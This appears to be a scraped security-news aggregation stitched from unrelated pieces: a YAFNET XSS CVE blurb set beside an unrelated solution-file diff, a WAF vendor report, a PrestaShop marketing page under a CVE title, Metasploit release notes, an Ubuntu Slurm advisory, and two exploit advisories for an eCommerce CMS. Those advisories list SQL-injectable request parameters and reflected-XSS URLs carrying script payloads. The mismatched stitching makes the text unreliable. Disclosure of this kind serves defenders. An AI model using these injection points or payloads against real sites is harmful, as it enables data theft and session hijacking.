A vulnerability was found in YAFNET up to 3.1.11 and classified as problematic. This issue affects some unknown processing of the component Signature Handler. The manipulation leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 3.1.12 is able to address this issue. The name of the patch is a1442a2bacc3335461b44c250e81f8d99c60735f. It is recommended to upgrade the affected component. The identifier VDB-220037 was assigned to this vulnerability.

@@ -59,16 +59,8 @@ Project("{9A19103F-16F7-4668-BE54-9A1E7A4F7556}") = "ServiceStack.OrmLite.SqlSer EndProject Project("{2150E333-8FDC-42A3-9474-1A3956D46DE8}") = "Tests", "Tests", "{66545891-3124-4CAF-897D-2A7280B0A7D4}" EndProject Project("{2150E333-8FDC-42A3-9474-1A3956D46DE8}") = "Externals", "Externals", "{A3427F65-AE3B-4962-8DC1-93551065C0A6}" EndProject Project("{9A19103F-16F7-4668-BE54-9A1E7A4F7556}") = "YAF.Tests.BasicTests", "..\\tests\\YAF.Tests.BasicTests\\YAF.Tests.BasicTests.csproj", "{51CC78BB-B5C2-46C3-B69D-5023F739B78C}" EndProject Project("{9A19103F-16F7-4668-BE54-9A1E7A4F7556}") = "YAF.Tests.CoreTests", "..\\tests\\YAF.Tests.CoreTests\\YAF.Tests.CoreTests.csproj", "{CEA1C60C-C6A7-4B01-9FC6-6292812E4E5E}" EndProject Project("{9A19103F-16F7-4668-BE54-9A1E7A4F7556}") = "YAF.Tests.Utils", "..\\tests\\YAF.Tests.Utils\\YAF.Tests.Utils.csproj", "{94C11F2B-E560-4075-A43A-59529CFAFC5C}" EndProject Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "HttpSimulator", "..\\tests\\Externals\\HttpSimulator\\HttpSimulator.csproj", "{CE9FFE92-9A64-483C-9F11-A27F83C0E14C}" EndProject Project("{2150E333-8FDC-42A3-9474-1A3956D46DE8}") = "Solution Items", "Solution Items", "{B7DF71FA-51C6-4798-887B-8AD4596629C0}" ProjectSection(SolutionItems) = preProject .editorconfig \= .editorconfig @@ -236,18 +228,6 @@ Global {5532392F-3038-428E-BE72-AB78A21BA84F}.Release|Mixed Platforms.Build.0 \= Release|Any CPU {5532392F-3038-428E-BE72-AB78A21BA84F}.Release|x86.ActiveCfg \= Release|Any CPU {5532392F-3038-428E-BE72-AB78A21BA84F}.Release|x86.Build.0 \= Release|Any CPU {51CC78BB-B5C2-46C3-B69D-5023F739B78C}.Debug|Any CPU.ActiveCfg \= Debug|Any CPU {51CC78BB-B5C2-46C3-B69D-5023F739B78C}.Debug|Any CPU.Build.0 \= Debug|Any CPU {51CC78BB-B5C2-46C3-B69D-5023F739B78C}.Debug|Mixed Platforms.ActiveCfg \= Debug|Any CPU {51CC78BB-B5C2-46C3-B69D-5023F739B78C}.Debug|Mixed Platforms.Build.0 \= Debug|Any CPU {51CC78BB-B5C2-46C3-B69D-5023F739B78C}.Debug|x86.ActiveCfg \= Debug|Any CPU {51CC78BB-B5C2-46C3-B69D-5023F739B78C}.Debug|x86.Build.0 \= Debug|Any CPU {51CC78BB-B5C2-46C3-B69D-5023F739B78C}.Release|Any CPU.ActiveCfg \= Release|Any CPU {51CC78BB-B5C2-46C3-B69D-5023F739B78C}.Release|Any CPU.Build.0 \= Release|Any CPU {51CC78BB-B5C2-46C3-B69D-5023F739B78C}.Release|Mixed Platforms.ActiveCfg \= Release|Any CPU {51CC78BB-B5C2-46C3-B69D-5023F739B78C}.Release|Mixed Platforms.Build.0 \= Release|Any CPU {51CC78BB-B5C2-46C3-B69D-5023F739B78C}.Release|x86.ActiveCfg \= Release|Any CPU {51CC78BB-B5C2-46C3-B69D-5023F739B78C}.Release|x86.Build.0 \= Release|Any CPU {CEA1C60C-C6A7-4B01-9FC6-6292812E4E5E}.Debug|Any CPU.ActiveCfg \= Debug|Any CPU {CEA1C60C-C6A7-4B01-9FC6-6292812E4E5E}.Debug|Any CPU.Build.0 \= Debug|Any CPU {CEA1C60C-C6A7-4B01-9FC6-6292812E4E5E}.Debug|Mixed Platforms.ActiveCfg \= Debug|Any CPU @@ -260,30 +240,6 @@ Global {CEA1C60C-C6A7-4B01-9FC6-6292812E4E5E}.Release|Mixed Platforms.Build.0 \= Release|Any CPU {CEA1C60C-C6A7-4B01-9FC6-6292812E4E5E}.Release|x86.ActiveCfg \= Release|Any CPU {CEA1C60C-C6A7-4B01-9FC6-6292812E4E5E}.Release|x86.Build.0 \= Release|Any CPU {94C11F2B-E560-4075-A43A-59529CFAFC5C}.Debug|Any CPU.ActiveCfg \= Debug|Any CPU {94C11F2B-E560-4075-A43A-59529CFAFC5C}.Debug|Any CPU.Build.0 \= Debug|Any CPU {94C11F2B-E560-4075-A43A-59529CFAFC5C}.Debug|Mixed Platforms.ActiveCfg \= Debug|Any CPU {94C11F2B-E560-4075-A43A-59529CFAFC5C}.Debug|Mixed Platforms.Build.0 \= Debug|Any CPU {94C11F2B-E560-4075-A43A-59529CFAFC5C}.Debug|x86.ActiveCfg \= Debug|Any CPU {94C11F2B-E560-4075-A43A-59529CFAFC5C}.Debug|x86.Build.0 \= Debug|Any CPU {94C11F2B-E560-4075-A43A-59529CFAFC5C}.Release|Any CPU.ActiveCfg \= Release|Any CPU {94C11F2B-E560-4075-A43A-59529CFAFC5C}.Release|Any CPU.Build.0 \= Release|Any CPU {94C11F2B-E560-4075-A43A-59529CFAFC5C}.Release|Mixed Platforms.ActiveCfg \= Release|Any CPU {94C11F2B-E560-4075-A43A-59529CFAFC5C}.Release|Mixed Platforms.Build.0 \= Release|Any CPU {94C11F2B-E560-4075-A43A-59529CFAFC5C}.Release|x86.ActiveCfg \= Release|Any CPU {94C11F2B-E560-4075-A43A-59529CFAFC5C}.Release|x86.Build.0 \= Release|Any CPU {CE9FFE92-9A64-483C-9F11-A27F83C0E14C}.Debug|Any CPU.ActiveCfg \= Debug|Any CPU {CE9FFE92-9A64-483C-9F11-A27F83C0E14C}.Debug|Any CPU.Build.0 \= Debug|Any CPU {CE9FFE92-9A64-483C-9F11-A27F83C0E14C}.Debug|Mixed Platforms.ActiveCfg \= Debug|Any CPU {CE9FFE92-9A64-483C-9F11-A27F83C0E14C}.Debug|Mixed Platforms.Build.0 \= Debug|Any CPU {CE9FFE92-9A64-483C-9F11-A27F83C0E14C}.Debug|x86.ActiveCfg \= Debug|Any CPU {CE9FFE92-9A64-483C-9F11-A27F83C0E14C}.Debug|x86.Build.0 \= Debug|Any CPU {CE9FFE92-9A64-483C-9F11-A27F83C0E14C}.Release|Any CPU.ActiveCfg \= Release|Any CPU {CE9FFE92-9A64-483C-9F11-A27F83C0E14C}.Release|Any CPU.Build.0 \= Release|Any CPU {CE9FFE92-9A64-483C-9F11-A27F83C0E14C}.Release|Mixed Platforms.ActiveCfg \= Release|Any CPU {CE9FFE92-9A64-483C-9F11-A27F83C0E14C}.Release|Mixed Platforms.Build.0 \= Release|Any CPU {CE9FFE92-9A64-483C-9F11-A27F83C0E14C}.Release|x86.ActiveCfg \= Release|Any CPU {CE9FFE92-9A64-483C-9F11-A27F83C0E14C}.Release|x86.Build.0 \= Release|Any CPU {AA001480-3713-4927-8650-ED1E16AFB791}.Debug|Any CPU.ActiveCfg \= Debug|Any CPU {AA001480-3713-4927-8650-ED1E16AFB791}.Debug|Any CPU.Build.0 \= Debug|Any CPU {AA001480-3713-4927-8650-ED1E16AFB791}.Debug|Mixed Platforms.ActiveCfg \= Debug|Any CPU @@ -322,11 +278,7 @@ Global {9E7362F6-25FE-4E06-884D-92AEA9A28D45} = {C9CC269F-1DC1-4189-9116-12EB6A726F0B} {BF9FE592-B675-4097-9F69-B2776FAC347F} = {C9CC269F-1DC1-4189-9116-12EB6A726F0B} {5532392F-3038-428E-BE72-AB78A21BA84F} = {A61BA819-987E-4F04-B4D8-0960363558C5} {A3427F65-AE3B-4962-8DC1-93551065C0A6} = {66545891-3124-4CAF-897D-2A7280B0A7D4} {51CC78BB-B5C2-46C3-B69D-5023F739B78C} = {66545891-3124-4CAF-897D-2A7280B0A7D4} {CEA1C60C-C6A7-4B01-9FC6-6292812E4E5E} = {66545891-3124-4CAF-897D-2A7280B0A7D4} {94C11F2B-E560-4075-A43A-59529CFAFC5C} = {66545891-3124-4CAF-897D-2A7280B0A7D4} {CE9FFE92-9A64-483C-9F11-A27F83C0E14C} = {A3427F65-AE3B-4962-8DC1-93551065C0A6} {AA001480-3713-4927-8650-ED1E16AFB791} = {A61BA819-987E-4F04-B4D8-0960363558C5} {7C82AFFA-FB8A-4227-BC7F-0697F7ED58F6} = {BDA94567-4516-4110-9743-085C36B24E35} EndGlobalSection

CVE-2023-0650: [FIXED] Stored XSS in Signature · YAFNET/YAFNET@a1442a2

The total number of 61,000 open vulnerabilities, including 1,700 critical ones that have been open for 180+ days, exposes businesses to potential attacks.

Indusface's research on 1,400+ Web apps, mobile apps, and APIs revealed that open vulnerabilities remain cybercriminals' most significant attack vector.

According to the report, 829 million attacks were blocked on the AppTrana WAF in the fourth quarter of 2022, a 79% increase from the third quarter.

The alarming finding is that 61,713 open vulnerabilities were found, which is a 50% jump from the third quarter. The number of open vulnerabilities directly relates to the increased threat actors.

How can you protect them? The best option is to fix known vulnerabilities using virtual patching at the WAF level while blocking attacks.

**Critical Vulnerabilities Found on Applications**

While any vulnerability carries a risk to your business, here are the top 10 high/critical vulnerabilities that hackers attempted to exploit during the fourth quarter of 2022:

*   Server-side request forgery
*   HTML injection
*   Cross-site scripting (XSS)
*   TLS/SSL server certificate will expire soon
*   Script source code disclosure
*   SQL injection
*   SSL certificate common name mismatch
*   TLS/SSL server certificate expired
*   Untrusted TLS/SSL server certificate
*   Insecure Direct Object References

Prioritize addressing these vulnerabilities if you have not done so already.

**Cost of Vulnerabilities**

A single vulnerability can invite thousands of cybersecurity troubles. Poodle, Heartbleed, EternalBlue, and Shellshock are just a few of the vulnerabilities that open businesses to security threats.

The report found 31% of vulnerabilities have been open for 180+ days. And 1,700+ of these are rated as critical and high vulnerabilities.

So, what happens if you don't patch the vulnerabilities? A failure to maintain this responsibility could have severe effects, including potential security breaches.

Back in 2017, the massive Equifax security breach made headlines. Hackers exploited the known vulnerability CVE-2017-5638 in their app framework and gained access to the company's system.

This breach exposed the personally identifiable information (PII) of 147 million people. Two years after the breach, the company said it spent $1.4 billion on cleanup costs and revamping its security program. Equifax agreed to pay up to $700 million to settle claims related to the breach.

The breach's total cost is likely higher than the reported settlements and expenses. It also includes intangible costs such as loss of trust, brand reputation, and long-term impact on the business.

**Managing Vulnerabilities With Virtual Patching**

Security patches play a vital role in dealing with vulnerabilities. They patch up the security gaps and resolve the risks. After all, successful exploitation means an insecure configuration or missing security control.

The patching process can, at times, be challenging. Many companies turn to virtual patching to protect their apps on the Web application firewall (WAF) when a system can't be patched immediately.

Virtual patching is a vulnerability shield that secures apps during your risk window and beyond. It enables you to scale your coverage and responses accordingly with appropriate defense, which can be applied in minutes or hours. Thereby, it reduces the risk of exposure to vulnerabilities.

Virtual patching is attained by implementing a security policy layer in the WAF. It eliminates application vulnerabilities without changing the codebase.

Companies can leverage virtual patching in two ways to mitigate vulnerabilities:

1.  Core rules
2.  Custom rules

The Indusface report found that the WAF core rule set blocks 40% of requests, and custom rules block 60%.

**Why Are the Custom Rules Gaining Momentum?**

Core rules are predefined, standardized, based on industry best practices, and designed to protect against known vulnerabilities. Security experts typically create these rules. Core rules are easy to implement and can provide high protection.

Since most dev teams work on sprints that are a few weeks long, vulnerabilities keep getting added with the changing code.

Most companies leverage weekly scans and periodic penetration testing on applications. Since fixing these on code will be long and arduous, product owners rely on WAF's custom rules to plug these vulnerabilities while their dev team focuses on shipping features.

Whenever the teams get to a security-focused sprint, they fix these vulnerabilities in the code.

Virtual patching is also used as a risk mitigation mechanism. For instance, we have observed that geofencing is gaining popularity in the custom rule category as application owners look to limit traffic from geographies where the application is not designed to be used. The other example is blacklisting or whitelisting IPs that are used to allow traffic to the application.

**False Positive Monitoring**

While the power of custom rules is undisputed, they also add the burden of monitoring applications for false positives.

In talking to several security leaders, one consistent theme that we keep hearing about is the lack of skilled security practitioners who can manage a complex application like a WAF/WAAP.

The other challenge is the worsening economy; security teams are increasingly being asked to do more with less.

We are seeing an increased trend of product owners relying on managed services to help with virtual patches and guarantee no false positives.

**Conclusion**

If the attackers discover a piece of exploitable code, the next step is taking advantage of the vulnerability.

The sooner you deploy the virtual patching, the sooner attackers look elsewhere. Keep your WAF running to ensure your security and bottom line.

**About the Author**

    

Venky is an application security technologist who built the new-age Web application scanner and cloud WAF AppTrana at Indusface as a founding CTO. Currently, he spends his time on driving product road map, customer success, growth, and technology adoption for US businesses.

AppSec Playbook 2023: Study of 829M Attacks on 1,400 Websites

PrestaShop module, totadministrativemandate before v1.7.1 was discovered to contain a SQL injection vulnerability.

**Your ecommerce.  
Your brand. Your rules.**

PrestaShop offers you a highly flexible and scalable ecommerce platform to launch an online business 100% owned and designed by you.

**Everything you need to sell products online**

All the ecommerce features you need, and more. With PrestaShop, develop your commerce online and grow your business.

**Customize your online store**

Personalize your ecommerce website: pick a theme, specific features, and everything your brand needs.

**Run your ecommerce website**

Manage everything from your website back office: product catalog, orders, payments, shipping, and data.

**Grow your revenue**

Scale your business with PrestaShop: launch marketing campaigns to reach more customers.

**Go international**

Sell across borders: conquer new markets with a multilanguage store and multicurrency options.

Take a look at what PrestaShop looks like from the back office.

**Join over 300,000 merchants**

“

Thanks to PrestaShop software, we were able to create a multilingual and multi-currency ecommerce site at a very reasonable total cost.

”

Chief Operating Officer, Bobbies

“

PrestaShop is a reliable software that has enabled us to constantly evolve our site over the last 6 years, all while allowing us to work independently, thanks to an intuitive back office.

”

Daan Sins

Co-founder, Huygens

“

PrestaShop is a handy, modular tool that allows us to continue to develop our omnichannel strategy.

”

Wassila Moussaoui

Digital Marketing and Communication Director, Pylones

**Be part of a thriving ecosystem**

PrestaShop is not only software, PrestaShop is also a thriving ecosystem of agencies, developers, and users.

Our partners are here to help

**Ready to sell online?**

Build your online store with PrestaShop in just a few clicks, or find the right expert to help you.

CVE-2022-46965: Create and build your online business with PrestaShop

Rapid7 Metasploit Pro versions 4.21.2 and lower suffer from a stored cross site scripting vulnerability, due to a lack of JavaScript request string sanitization. Using this vulnerability, an authenticated attacker can execute arbitrary HTML and script code in the target browser against another Metasploit Pro user using a specially crafted request. Note that in most deployments, all Metasploit Pro users tend to enjoy privileges equivalent to local administrator.

*   Pro: We completed dependency updates required to support the latest Metasploit Framework version 6.3.
    
*   Pro: We completed a periodic update of the Java Runtime to maintain a good security posture.
    
*   PR 16685 - Updates the Kerberos Authentication support to include multiple new encryption types, which will allow Kerberos Authentication to work against newer targets that have older encryption types disabled.
    
*   PR 16689 - Adds support for host addresses in kerberos tickets.
    
*   PR 16700 - Updates LDAP modules to support Kerberos and NTLM authentication.
    
*   PR 16749 - Adds Kerberos Authentication support to WinRM modules.
    
*   PR 16760 - Updates WinRM sessions to support delegated Kerberos tickets, to be able to access additional network resources from the compromised server.
    
*   PR 16770 - This enables the reuse of previously obtained CCache files for MSSQL, SMB, WinRM, and LDAP authentication. After a successful authentication using Kerberos, tickets are stored in CCache files. They will be reused for subsequent authentications without having to renegotiate new Kerberos tickets.
    
*   PR 17025 - Adds a new USER_RID option to the Kerberos ticket forging module auxiliary/admin/kerberos/forge_ticket.
    
*   PR 17340 - The Python Meterpreter has been updated to warn that the bind information is ignored when a reverse port forward is created to prevent confusion when this information is supplied by a user.
    
*   PR 17343 - This makes performance improvements to the windows/local/unquoted_service_path module.
    
*   PR 17373 - Adds ticket flags when presenting krb5 ccaches on msfconsole.
    
*   PR 17374 - Adds klist command support to list Kerberos tickets in the database.
    
*   PR 17451 - This adds netntlm and netntlmv2 hashes support to auxiliary/analyze/crack_windows module.
    
*   PR 17456 - This PR adds a new KrbOfferedEncryptionTypes option that allows users to configure what encryption types are used with the KDC.
    
*   PR 17466 - This updates the auxiliary/scanner/smb/smb_version module to store additional service information in the database so it can be viewed later.
    
*   PR 17473 - Updates the docs site to have an edit link at the bottom of each page which will take you to the corresponding markdown file on Github for editing.
    
*   PR 17475 - Enables the datastore\_fallbacks feature flag by default. This is a rewrite of Metasploit's datastore to fix multiple bugs and edge-cases. The unset command will now consistently unset previously set datastore values, so that default values are used once again.
    
*   PR 17480 - A new alias has been added for payloads called exploit which will perform the same action as to_handler, to help users familiar with exploit modules to use the same familiar exploit method to open handlers when using payloads.
    
*   PR 17518 - A new adapter has been added to run Python payloads on Windows. This is notably useful for testing Python payloads as SYSTEM or delivered on demand through an exploit module such as psexec.
    
*   PR 17519 - Improves the SMTP delivery error handling for the auxiliary/client/smtp/emailer module.
    
*   PR 17526 - Updates the show options and show advanced command to visually group options with the same conditions together, such as options that require an action or datastore value to be set.
    
*   PR 17535 - This adds NTLM hash recover to the kerberos/get\_ticket module.
    
*   PR 17539 - Adds additional error handling for Kerberos error codes.
    

*   Pro: We addressed CVE-2023-0599, a stored XSS vulnerability on the individual host services page reported by Michael Caruso. Thank you for the coordinated disclosure.
    
*   Pro: We improved the CLI startup process to ensure running tasks are no longer interrupted by starting a Pro console.
    
*   PR 17385 - This PR fixes the file write and file append methods to return the expected Boolean values rather than nil.
    
*   PR 17455 - Fixes an issue where Kerberos responses could not be received in smaller chunks, such as in bandwidth restricted networks.
    
*   PR 17482 - Fixes a connection issue with reverse\_https stagers that are executed on Windows servers attempting to negotiate TLS1 when Metasploit was using OpenSSL3.
    
*   PR 17491 - A bug has been fixed in the lib/msf/core/exploit/remote/ldap.rb library that handles LDAP communications for several modules to ensure that failures use the right namespace when throwing errors to prevent crashes.
    
*   PR 17497 - This fixes an error where modules that issue certificates (icpr\_cert and now auxiliary/admin/dcerpc/cve\_2022\_26923\_certifried) would crash if the response from the server was that the certificate was submitted and no certificate was returned. This updates the code to check if the certificate is present before attempting to process it.
    
*   PR 17516 - The version of metasploit-payloads has been bumped up to add support for dual IPv4/IPv6 stacks to Python Meterpreter, add support for enumerating desktops with the enumdesktops command to Python Meterpreter, and also add support for binding to the specified localhost to compiled versions of Meterpreter.
    
*   PR 17525 - Fixes a deprecation warning when using socks proxy support in Metasploit.
    
*   PR 17541 - Fixes a crash that occurs when domain option is set to blank.
    
*   PR 17549 - Updates the inspect_ticket module to output a user friendly error if the ticket decryption has failed, i.e. due to an invalid decryption key.
    

*   PR 16625 - Adds a new scanner/kerberos/kerberos_login module for bruteforcing and verifying credentials against a Kerberos server. Accounts which do not require preauthnetication, i.e. AS-REP Roastable accounts, will have the hashes output for offline cracking.
    
*   PR 17348 - This PR adds a module that performs a DoS attack on Mirage Firewall versions 0.8.0-0.8.3.
    
*   PR 17407 - This adds an exploit that targets various versions of Cacti network-monitoring software. For versions 1.2.22 and below, there exists an unauthenticated command injection vulnerability in remote_agent.php that when exploited, will result in remote code execution as the user running the Cacti server.
    
*   PR 17449 - A new module has been added for CVE-2021-44529, an unauthenticated code injection vulnerability in the Ivanti EPM Cloud Services Appliance (CSA) before version 4.6.0-512. Successful exploitation requires sending a crafted cookie to the client endpoint at /client/index.php to get command execution as the nobody user.
    
*   PR 17479 - This adds an exploit module that leverages an unauthenticated SQLi against Wordpress plugin Paid Membership Pro. This vulnerability is identified as CVE-2023-23488 and affects versions prior to 2.9.8. This module retrieves Wordpress usernames and password hashes using Time-Based Blind SQL Injection technique.
    
*   PR 17533 - Enhances the auxiliary/admin/kerberos/get\_ticket module with PKINIT functionality.

CVE-2023-0599: Metasploit Release Notes

Ubuntu Security Notice 4781-2 - USN-4781-1 fixed several vulnerabilities in Slurm. This update provides the corresponding updates for Ubuntu 14.04 ESM and Ubuntu 16.04 ESM. It was discovered that Slurm incorrectly handled certain messages between the daemon and the user. An attacker could possibly use this issue to assume control of an arbitrary file on the system. This issue only affected Ubuntu 16.04 ESM.

==========================================================================  
Ubuntu Security Notice USN-4781-2  
February 01, 2023

slurm-llnl vulnerabilities  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 16.04 ESM  
- Ubuntu 14.04 ESM

Summary:

Several security issues were fixed in Slurm.

Software Description:  
- slurm-llnl: Simple Linux Utility for Resource Management

Details:

USN-4781-1 fixed several vulnerabilities in Slurm. This update provides  
the corresponding updates for Ubuntu 14.04 ESM (CVE-2016-10030) and  
Ubuntu 16.04 ESM (CVE-2018-10995).

Original advisory details:

  It was discovered that Slurm incorrectly handled certain messages  
  between the daemon and the user. An attacker could possibly use this  
  issue to assume control of an arbitrary file on the system. This  
  issue only affected Ubuntu 16.04 ESM.  
  (CVE-2016-10030)

  It was discovered that Slurm mishandled SPANK environment variables.  
  An attacker could possibly use this issue to gain elevated privileges.  
  This issue only affected Ubuntu 16.04 ESM. (CVE-2017-15566)

  It was discovered that Slurm mishandled certain SQL queries. A local  
  attacker could use this issue to gain elevated privileges. This  
  issue only affected Ubuntu 14.04 ESM, Ubuntu 16.04 ESM and  
  Ubuntu 18.04 ESM. (CVE-2018-7033)

  It was discovered that Slurm mishandled user names and group ids. A local  
  attacker could use this issue to gain administrative privileges.  
  This issue only affected Ubuntu 14.04 ESM and Ubuntu 18.04 ESM.  
  (CVE-2018-10995)

  It was discovered that Slurm mishandled 23-bit systems. A local attacker  
  could use this to gain administrative privileges. This issue only affected  
  Ubuntu 14.04 ESM, Ubuntu 16.04 ESM and Ubuntu 18.04 ESM. (CVE-2019-6438)

  It was discovered that Slurm incorrectly handled certain inputs  
  when Message Aggregation is enabled. An attacker could possibly  
  use this issue to launch a process as an arbitrary user.  
  This issue only affected Ubuntu 16.04 ESM, Ubuntu 18.04 ESM  
  and Ubuntu 20.04 ESM. (CVE-2020-12693)

  It was discovered that Slurm incorrectly handled certain RPC inputs.  
  An attacker could possibly use this issue to execute arbitrary code.  
  This issue only affected Ubuntu 18.04 ESM and Ubuntu 20.04 ESM.  
  (CVE-2020-27745)

  Jonas Stare discovered that Slurm exposes sensitive information related  
  to the X protocol. An attacker could possibly use this issue to obtain  
  a graphical session from an arbitrary user. This issue only affected  
  Ubuntu 18.04 ESM and Ubuntu 20.04 ESM. (CVE-2020-27746)

  It was discovered that Slurm incorrectly handled environment parameters.  
  An attacker could possibly use this issue to execute arbitrary code.  
  (CVE-2021-31215)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 16.04 ESM:  
   libpam-slurm                    15.08.7-1ubuntu0.1~esm5  
   libpmi0                         15.08.7-1ubuntu0.1~esm5  
   libslurm-perl                   15.08.7-1ubuntu0.1~esm5  
   libslurm29                      15.08.7-1ubuntu0.1~esm5  
   libslurmdb-perl                 15.08.7-1ubuntu0.1~esm5  
   libslurmdb29                    15.08.7-1ubuntu0.1~esm5  
   slurm-client                    15.08.7-1ubuntu0.1~esm5  
   slurm-client-emulator           15.08.7-1ubuntu0.1~esm5  
   slurm-llnl                      15.08.7-1ubuntu0.1~esm5  
   slurm-llnl-slurmdbd             15.08.7-1ubuntu0.1~esm5  
   slurm-wlm                       15.08.7-1ubuntu0.1~esm5  
   slurm-wlm-basic-plugins         15.08.7-1ubuntu0.1~esm5  
   slurm-wlm-emulator              15.08.7-1ubuntu0.1~esm5  
   slurm-wlm-torque                15.08.7-1ubuntu0.1~esm5  
   slurmctld                       15.08.7-1ubuntu0.1~esm5  
   slurmd                          15.08.7-1ubuntu0.1~esm5  
   slurmdbd                        15.08.7-1ubuntu0.1~esm5  
   sview                           15.08.7-1ubuntu0.1~esm5

Ubuntu 14.04 ESM:  
   libpam-slurm                    2.6.5-1ubuntu0.1~esm6  
   libpmi0                         2.6.5-1ubuntu0.1~esm6  
   libslurm-perl                   2.6.5-1ubuntu0.1~esm6  
   libslurm26                      2.6.5-1ubuntu0.1~esm6  
   libslurmdb-perl                 2.6.5-1ubuntu0.1~esm6  
   libslurmdb26                    2.6.5-1ubuntu0.1~esm6  
   slurm-llnl                      2.6.5-1ubuntu0.1~esm6  
   slurm-llnl-basic-plugins        2.6.5-1ubuntu0.1~esm6  
   slurm-llnl-slurmdbd             2.6.5-1ubuntu0.1~esm6  
   slurm-llnl-sview                2.6.5-1ubuntu0.1~esm6  
   slurm-llnl-torque               2.6.5-1ubuntu0.1~esm6

In general, a standard system update will make all the necessary changes.

References:  
   https://ubuntu.com/security/notices/USN-4781-2  
   https://ubuntu.com/security/notices/USN-4781-1  
   CVE-2016-10030, CVE-2018-10995

Ubuntu Security Notice USN-4781-2

eCommerce Marketplace Platform CMS version 1.7 suffers from a remote SQL injection vulnerability.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                  [ Vulnerability ]                                   ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : mybizcms.com                                                               ││  Vendor   : MyBizCMS                                                                   ││  Software : Emporium Multi-Vendor - eCommerce Marketplace Platform CMS 1.7             ││  Vuln Type: SQL Injection                                                              ││  Impact   : Database Access                                                            ││                                                                                        ││────────────────────────────────────────────────────────────────────────────────────────││                                                                                       ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│ Release Notes:                                                                         ││ ═════════════                                                                          ││                                                                                        ││ SQL injection attacks can allow unauthorized access to sensitive data, modification of ││ data and crash the application or make it unavailable, leading to lost revenue and     ││ damage to a company's reputation.                                                      ││                                                                                        │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets:    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL            CryptoJob (Twitter) twitter.com/0x0CryptoJob     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2023                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Path: /categories/phones/categories/phones?min_price=2485[SQLI]&max_price=145000[SQLI]&brand[]=16&review_ratings=5&a4tech-brand[]=50[SQLI]&battery[]=44[SQLI]&storage[]=41[SQLI]&display[]=37[SQLI]&performance[]=36[SQLI]&attribute3[]=7[SQLI]GET parameter 'min_price' is vulnerable to SQLIGET parameter 'max_price' is vulnerable to SQLIGET parameter 'a4tech-brand[]' is vulnerable to SQLIGET parameter 'battery[]' is vulnerable to SQLIGET parameter 'display[]' is vulnerable to SQLIGET parameter 'performance[]' is vulnerable to SQLIGET parameter 'attribute3[]' is vulnerable to SQLI[-] Done

eCommerce Marketplace Platform CMS 1.7 SQL Injection

eCommerce Marketplace Platform CMS version 1.7 suffers from a cross site scripting vulnerability.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                  [ Vulnerability ]                                   ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : mybizcms.com                                                               ││  Vendor   : MyBizCMS                                                                   ││  Software : Emporium Multi-Vendor - eCommerce Marketplace Platform CMS 1.7             ││  Vuln Type: Reflected XSS                                                              ││  Impact   : Manipulate the content of the site                                         ││                                                                                        ││────────────────────────────────────────────────────────────────────────────────────────││                                                                                       ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│  Release Notes:                                                                        ││  ═════════════                                                                         ││  The attacker can send to victim a link containing a malicious URL in an email or      ││  instant message can perform a wide variety of actions, such as stealing the victim's  ││  session token or login credentials                                                    ││                                                                                        │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets:    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL            CryptoJob (Twitter) twitter.com/0x0CryptoJob     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2023                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Path: /searchGET parameter 'pg' is vulnerable to XSS/search?q=&pg=2vo1rf%3cscript%3ealert(1)%3c%2fscript%3ew6fsgPath: /categories/phonesGET parameter 'max_price' is vulnerable to XSS/categories/phones?min_price=2485&max_price=fulkc"><script>alert(1)</script>hpbwmPath: /categories/phonesGET parameter 'min_price' is vulnerable to XSS/categories/phones?min_price=2485i95td%22%3e%3cscript%3ealert(1)%3c%2fscript%3erziag[-] Done

eCommerce Marketplace Platform CMS 1.7 Cross Site Scripting

Online Eyewear Shop version 1.0 suffers from a remote SQL injection vulnerability.

